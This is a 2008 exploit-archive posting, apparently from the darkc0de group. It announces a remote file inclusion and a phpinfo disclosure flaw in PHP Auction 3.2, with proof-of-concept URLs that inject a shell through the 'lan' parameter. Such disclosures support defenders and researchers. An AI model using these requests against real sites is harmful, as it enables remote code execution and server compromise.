Home / exploits phpauction32-rfi.txt
Posted on 06 September 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # ---d3hydr8-rsauron -P47r1ck - r45c4l - baltazar - sh4rpr00ter# # -# Smasher - sinner_01 - FeDeReR - Anarki- Marezzi #- # ################################################################ # # Author: Beenu Arora # # Home : www.BeenuArora.com # # Python Dark Codes: www.BeenuArora.com/work.html # # Share the c0de! # ################################################################ # # App Name: PHP Auction 3.2 # # App Home: http://www.phpauction.org/ # # Vulnerablity : Remote File Inclusion, Zend PHP Information Disclosure # # Condition: allow_url_fopen =On # # POC: http://localhost/auction/index.php?lan=Evilshell # # POC:http://localhost/auction/phpinfo.php ################################################################ # Vuln Discovered 06/09/2008
